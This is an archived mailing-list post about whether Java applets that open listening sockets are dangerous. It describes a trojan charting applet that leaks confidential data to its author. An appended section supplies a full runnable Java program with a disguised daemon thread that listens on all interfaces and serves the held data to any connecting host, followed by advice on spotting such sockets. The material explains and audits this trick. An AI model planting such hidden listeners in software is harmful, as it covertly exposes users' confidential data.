Aviram Jenik writes:

> nino wrote:
>
> > The implications are obvious. If any host can connect to the machine
> > running the applet, you could tell java to do things like the boserver.
> > If you have a completely open socket, it's rock n' roll !
>
> No, it's not.
>
> Yes, you can connect to the open socket, but the applet can't do any I/O, so
> it's basically harmless (just like any other applet).

The main issue, I think, is information leakage between the Web site that uses the applet and the applet's author. Consider this scenario: a Bad Guy puts out a compiled applet in the public domain that seems to do something innocent like chart business graphics. Some company then picks up this applet and uses it to display its confidential business plan to authorized hosts in branch offices. Unbeknownst to the company or the branch office, the applet has actually opened a listen socket, has accepted a connection from the applet's original author, and is currently transmitting the confidential information to an untrusted host!

Lincoln

--
========================================================================
Lincoln D. Stein                       Cold Spring Harbor Laboratory
lsteinat_private                       Cold Spring Harbor, NY
========================================================================
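The scenario Lincoln describes, reduced to runnable code as an added illustration (this is not code from the thread or from any real applet): a "chart" component that never reads a file or opens an outbound connection, yet still leaks the data it was handed, because it quietly binds a ServerSocket and writes that data to whoever connects. The class name LeakyChart, the thread name, the port choice and the sample "business plan" lines are all constructed for the demo; the code runs as a plain Java program (java LeakyChart.java) with no SecurityManager installed.

```java
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.PrintWriter;
import java.net.ServerSocket;
import java.net.Socket;
import java.util.List;

/**
 * Stand-in for the "innocent" business-chart component in the scenario
 * (hypothetical class, not taken from any real applet). It performs no
 * file or outbound network I/O; it only holds the numbers it was asked to
 * draw. The hidden part is startBackdoor(): a daemon thread that listens on
 * a TCP port and writes those numbers to any peer that connects.
 */
public class LeakyChart {
    private final List<String> series;   // the data the page asked us to chart
    private final ServerSocket listener;

    public LeakyChart(List<String> series, int port) throws IOException {
        this.series = series;
        // Binds on all interfaces, so any host that can reach this machine can connect.
        // In an applet this is where SecurityManager.checkListen() would be consulted.
        this.listener = new ServerSocket(port);
        startBackdoor();
    }

    public int port() { return listener.getLocalPort(); }

    /** The advertised behaviour: summarise the series for display. */
    public String render() {
        return "chart of " + series.size() + " points, first: " + series.get(0);
    }

    private void startBackdoor() {
        Thread t = new Thread(() -> {
            while (!listener.isClosed()) {
                // accept() is the other sandbox checkpoint: SecurityManager.checkAccept().
                try (Socket peer = listener.accept();
                     PrintWriter out = new PrintWriter(peer.getOutputStream(), true)) {
                    // No read of any file or host is needed: the secret is already in memory.
                    for (String point : series) out.println(point);
                } catch (IOException e) {
                    return; // listener closed, stop serving
                }
            }
        }, "chart-refresh"); // innocuous-looking thread name
        t.setDaemon(true);
        t.start();
    }

    public void close() throws IOException { listener.close(); }

    /** Constructed demo: the "branch office" loads the chart, the "author" connects and reads it out. */
    public static void main(String[] args) throws IOException {
        List<String> plan = List.of("Q1 revenue 1.2M",          // constructed sample data
                                    "Q2 forecast 1.9M",
                                    "acquisition target: ACME");
        LeakyChart chart = new LeakyChart(plan, 0); // port 0: let the OS pick a free port
        System.out.println("applet shows: " + chart.render());

        // The remote party needs nothing but the address and port.
        try (Socket author = new Socket("127.0.0.1", chart.port());
             BufferedReader in = new BufferedReader(new InputStreamReader(author.getInputStream()))) {
            String line;
            while ((line = in.readLine()) != null) System.out.println("leaked: " + line);
        }
        chart.close();
    }
}
```

Two practical notes. First, whether a browser's applet sandbox lets this happen turns on what its SecurityManager does in checkListen() and checkAccept(), which is exactly the point the thread is arguing about; the demo above installs no SecurityManager, so it shows the leak, not the sandbox's verdict. Second, the observable symptom on the victim host is an unexpected LISTEN socket owned by the browser process (netstat -an, or lsof -i on Unix), which is a cheap thing to check when auditing a third-party applet.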
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:32:47 PDT